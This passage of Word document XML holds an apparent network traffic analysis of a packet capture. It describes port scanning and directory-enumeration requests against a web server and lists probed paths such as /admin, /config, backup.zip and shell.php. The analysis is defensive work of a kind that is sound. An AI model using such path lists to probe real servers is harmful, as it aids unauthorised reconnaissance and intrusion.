        </w:rPr>
        <w:t xml:space="preserve">213.86 and 172.70.205.130 was sending a connection request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">s from different ports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 134.22.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">31.221</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> port 80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> without any </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">more request and then close the connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">s</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055819"/>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89612" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId107"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="30558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68.00pt;height:240.62pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId107"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highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Frame 97: A new IP 136.243.111.17 did a 3-way handshake and  did a GET / HTTP/1.1</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> with User-Agent: SiteCheckerBotCrawler/1.0 (+http://sitechecker.pro) at frame 100 and got a 200 OK from the  134.22.31.221. IP 138.201.202.232 also did the same</w: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710771"/>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80484" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId108"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="37107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68.00pt;height:292.19pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId10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5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IP 136.243.111.17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> started sending connection requests to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">the server IP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rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> using different ports. This appears to be a bot behavior checking for open ports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w: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eastAsia="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692715"/>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5087" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId109"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="36927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68.00pt;height:290.76pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId109"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Style w:val="664"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0"/>
        <w:rPr>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Frame 339 - 342: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">IP 136.243.111.17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> got a 3-way handshake from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">the server IP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rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> on port 80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and started a HTTP protocol using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">GET / HTTP/1.1\r\n with User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trying different web path like (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">randomfile1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> etc)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> getting a 404 Not Found</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> all done in rapid fast time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5943600" cy="3684310"/>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19568" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId110"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="36843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68.00pt;height:290.10pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId110" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>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8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Overview of the HTTP Stream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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HTTP GET Requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: The attacker is sending requests to various paths (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/randomfile1</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/frand2</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/index</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/archive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, etc.).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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404 Not Found Responses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: The server responds with a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">404 Not Found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> status code, indicating that the requested resource does not exist.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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User-Agent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: The requests are sent using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is an outdated browser signature. This is often used by automated tools or scripts to mimic a legitimate browser.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">This activity is a classic example of directory enumeration or web server probing. The attacker is trying to discover:</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Common Files and Directories: The attacker is checking for common files (e.g., index.php, admin.php, backup.zip) and directories (e.g., /uploads, /admin, /database).</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Hidden or Misconfigured Resources:  The attacker is looking for resources that may have been accidentally  exposed or misconfigured (e.g., backup files, configuration files, or  sensitive directories).</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Vulnerabilities: By probing for specific paths, the attacker may be trying to identify vulnerabilities such as:</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Directory Traversal: Attempting to access files outside the web root.</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File Inclusion: Looking for files that can be included or executed (e.g., shell.php).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Misconfigured Access Controls: Checking if sensitive directories are accessible without authentication.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A. Common Paths Being Probed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker is probing for a wide range of paths, including:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Common Directories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/admin</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/database</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/config</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/backup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/logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Common Files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index.php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backup.zip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config.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Numerical Paths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/02</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/03</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/2004</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/2007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (likely probing for date-based backups or versioned files).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Sensitive Endpoints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/register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/login</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/security</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/profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">B. Patterns in the Requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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High Volume of Requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: The attacker is sending a large number of requests in a short period, which is typical of automated tools.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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Outdated User-Agent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: The use of an outdated browser signature (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MSIE 6.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) suggests that the requests are automated and not from a legitimate user.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">404 Responses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Since all requests result in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">404 Not Found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, it appears that the attacker has not yet found any valid resources. However, this does not mean the server is safe—it simply means the attacker has not yet discovered any vulnerabilities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
